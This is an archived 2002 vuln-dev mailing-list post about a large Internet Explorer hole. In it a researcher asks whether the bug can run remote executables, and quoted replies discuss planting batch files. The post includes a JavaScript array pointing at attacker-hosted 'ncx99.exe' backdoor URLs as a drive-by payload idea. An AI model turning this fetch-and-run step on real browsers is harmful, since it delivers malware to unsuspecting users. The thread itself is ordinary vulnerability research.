Re: Rather large MSIE-hole

From: KF (dotslash@snosoft.com)
Date: 03/14/02 

Date: Thu, 14 Mar 2002 17:48:27 -0500
From: KF <dotslash@snosoft.com>
To: vuln-dev@security-focus.com

Another thought... will this bug run an executable from a web page? If
so you could just make your own binary to do whatever you wanted. Like
http://mysiteathome.com/malware.exe or something along those lines. I
would HOPE that it asks to save the file to disk or even better ignore
it all together. Maybe try something like:

var programName=new Array(
    'http://mysiteathome.com/ncx99.exe',
    'http://someothersite.com/ncx99.exe',
);

I would do this myself but I don't have any windows boxen to test.
-KF

Paul D. Campbell wrote:

>>Could you not create a batch file that housed the commands you wanted
>>to run
>>(with args) and just run the batch file?
>>I apologise if someone has already addressed this.
>>
>>-Eric
>>
>
>You would probably be able to do this. However, you would first need
>to place the batch file on the target machine. Then you would have to
>sit around and hope the user visits your malicious site. Though, if
>you have the capability to write to someone's harddrive you could do
>something much nastier than this :)
>
>Paul
>
>

Relevant Pages

  • Re: Running Batch file from Netlogon Share
    ... Thank you Paul. ... I checked and the script has replicated. ... Here's the command I'm trying to run from the batch file: ... >> check the event logs, but have not seen anything related to my problem. ...
    (microsoft.public.windows.server.active_directory)
  • Re: Please help. Run batch file on server from asp.net page
    ... > Hi Paul, ... >> run a batch file on the server. ... >> The batch file unzips a file which is located in the working directory ... However when I execute the code from the asp.net page ...
    (microsoft.public.dotnet.framework.aspnet)
  • Re: How do I multiple word documents in date order?
    ... In the time it would take you to create, configure and test the batch file, you could have done these one at a time. ... Paul wrote: ... could drag and drop each file on the printer Icon, you could write a batch file file that listed each file in the order it is to print. ... But you can't just select a group and send to printer as the "sort order" is a visual thing, and doesn't affect the order in which the files are located and passed to the print queue. ...
    (microsoft.public.office.misc)
  • RE: Rather large MSIE-hole
    ... will this bug run an executable from a web page? ... >I would do this myself but I don't have any windows boxen to test. ... >Paul D. Campbell wrote: ... >>>Could you not create a batch file that housed the commands you wanted ...
    (Vuln-Dev)
  • Re: The system cannot find the batch label specified
    ... It seems like the if the target label is spanning the batch processor's ... I have created simple batch file as following. ... If you still think that there is a bug then you should do some ... The original file was saved as Unix format ...
    (microsoft.public.windowsxp.general)